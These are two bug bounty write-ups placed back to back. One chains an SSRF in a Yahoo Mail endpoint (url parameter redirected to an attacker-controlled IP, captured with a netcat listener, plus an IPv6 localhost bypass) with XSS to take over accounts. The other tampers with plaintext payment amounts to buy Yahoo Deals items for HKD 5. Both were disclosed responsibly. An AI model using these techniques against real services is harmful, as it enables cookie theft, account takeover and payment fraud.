When Server Side Request Forgery combine with Cross Site Scripting

Summary

Hi, this is my third post about my Bug Hunting Journey. This finding is an interesting one, as it demonstrates how to chain different type of bugs in order to completely take over victim’s account. This finding allows me to take over your Yahoo account with just an click of a link. Sounds scary? Read on.

GET /d/xxxxxxxx/xxxxxxx?appid=YMail&crumb=kPun5CrTk1R&wssid=&clientId=mailsearch&timezone=Asia%2FHong_Kong&allowGoogleDocs=1&ymreqid=a5551380-75ce-13d6-1c16-c00001016500&url=http%3A%2F%2Fprod.mail.bf1.yahoo.com%2Fglasd%3f%2F%3FaccountIds%3D1%26timezone%3DAsia%252FHong_Kong%26mailboxid%3DBjJ-0j4oSqYSwadMXdzKCqzxjQ0gZZDkccM7CRStMSDerKbSfJwDAjhyiIZLOLd5xlNdGH4nkLovJSeSm65J69qU1w%26appid%3DYMail%26query%3Dis%253Aunread%26limit%3D50%26excludefolders%3DARCHIVE%26threads%3Dtrue%26vertical%3DMESSAGES%26order%3Dtime%2Bdesc%26cursor%3D49&listContentType=IMAGE

Take some time to read the request, and try to find something that is unusual in the request.

Not sure what you think it is unusual, but the parameter url look quite fun to me. Because it seems I can control the destination of the url, by changing http%3A%2F%2Fprod.mail.bf1.yahoo.com%2F to http%3Amysite.com, then I could make a Server Side Request Forgery.

So I did the test, make it points to my own server, I set up nc -lnvp 80 to listen for the traffic. The traffic went through and my Yahoo Cookies Header is included in the GET request from the Yahoo Server.

Let’s do a quick recap, first, set up a nc -lnvp 80 in my server, lets say my server ip address is 123.123.123.123

Then, make a get request to my server, by changing http%3A%2F%2Fprod.mail.bf1.yahoo.com%2F to http%3A123.123.123.123

Finally, a request from Yahoo Owned server has made a request to my 123.123.123.123, and included all of my yahoo header in the request.

So I can further confirm it is vulnerable to internal scanning as well, by changing the url to http://127.0.0.1, it failed, so i used another trick, http://::80, this is ipv6, and bypassed the 127.0.0.1 check, and then I was able to perform internal port scanning and other behavior as well.

Remember I said in the title that I could own your yahoo account by only one click? It is not a click bait, it is true, because when this attack combines with XSS, that recently discovered by klikki, then he can do more than just viewing the email of victim, he can actually takeover their account by forcing them to make the SSRF request to attacker owned server and get a copy of their cookies.

Abusing Multistage Logic Flaw to Buy Anything for Free at hk.deals.yahoo.com

Welcome, this is my first write-up of my Bug Bounty Journey that explain how I earn $3000 reward from Yahoo, hope you enjoy.

Introduction

I have started my Bug Bounty Journey after finishing my OSCP lab session in June, I started to check on yahoo.com.hk first, it didn’t went well for a month, but after I read the book “The Web Application Hackers Handbook”, I suddenly realize there might be a multistage logic flaw during Yahoo Deals checkout process, so I decided to take a look and fuzz around and see what things could go wrong in the process. And I finally come up with a bug that allows me to buy arbitrary items with arbitrary price on https://hk.deals.yahoo.comhttps://hk.shop.yahoo.com and https://hk.auctions.yahoo.com

Let start digging

Yahoo! Deals, Shop, Auctions, are quite prmoinent service in Hong Kong, they provide a platform that allows user to trade items with Yahoo Payment system. I started to buy an item at hk.shop.yahoo.com, I followed along the process and monitor the traffic by Burp Suite.

Buying Page in Yahoo
Buying Page in Yahoo
Entering Delivery Content in Yahoo
Entering Delivery Content in Yahoo

When I checked on the checkout traffic, here is things start interesting. Here is the request made when I pressed “Check Out Now”

Checkout in Cart Burp Interception
Checkout in Cart Burp Interception

If we look closely, you can see the orderInfo has something important, paymentAmount is sent in plain text, in this case, it is 450 HKD. I found this interesting and decided to manipulate this amount through out the process. Fortunately, Yahoo system keeps validating the paymentAmount, when I change the paymentAmount to other values, it would return this page.

Checkout Error when trying to manipulate the paymentAmount
Checkout Error when trying to manipulate the paymentAmount

I keep experimenting and could not find a way to bypass its validation on price, until I finally reached the part where I would redirect to a third party payment system to finish my credit card payment. Due to its sensitive nature, I am not going to include the name of third party payment system here.

Here is the Burp Interception of the redirection

Details of Redirection of Third Party Payment Checkout Process
Details of Redirection of Third Party Payment Checkout Process

As we look closely to the Referrer and  POST parameter “amount”, we can see the amount is once again transmitted in plain text, so I intuitively manipulate the amount to “5” in both places, and the result is a surprise.

A Payment Page that is stating to accept HKD 5
A Payment Page that is stating to accept HKD 5

From this point onward, everything went smooth, I entered my credit card info, pass the mobile phone SMS authentication, and after finishing, I was presented with this page.

Successful Checkout Page in Yahoo
Successful Checkout Page in Yahoo

I have a final check on my credit card statement, the payment amount was indeed 5 HKD.

The End

I believe the consequences of this bug is self-explanatory, I am going to pass on explaining how would this affect Yahoo. This kind of vulnerability is a classic case of lacking validation on client supplied data. And this could lead to disastrous result like bypassing login mechanism, transferring money to an unauthenticated account, and in this case, purchasing items with client supplied price.

Thank you very much for reading my first bug bounty write-up, I hope you enjoyed it.

If you are one of the bug bounty hunter and live in Hong Kong, please let me know and contact me asap, cause I am desparately to find a local friend that could share ideas in Hunting Bugs.

Feel free to leave your thoughts below, and there will be a few more write-ups coming in next few weeks.

Timeline:

Jul 15th 2016: Reported to Yahoo

Jul 15th 2016: Receive Responsefrom junot that asked to confirm credit card was indeed charged for HKD 5

Jul 16th 2016: Provide credit card statement to Yahoo

Jul 20th 2016: Receive Response from junot that they have fixed the bug and ask to confirm it has been fixed

Jul 27th 2016: Receive response from junot about receiving Bug Bounty award $3000USD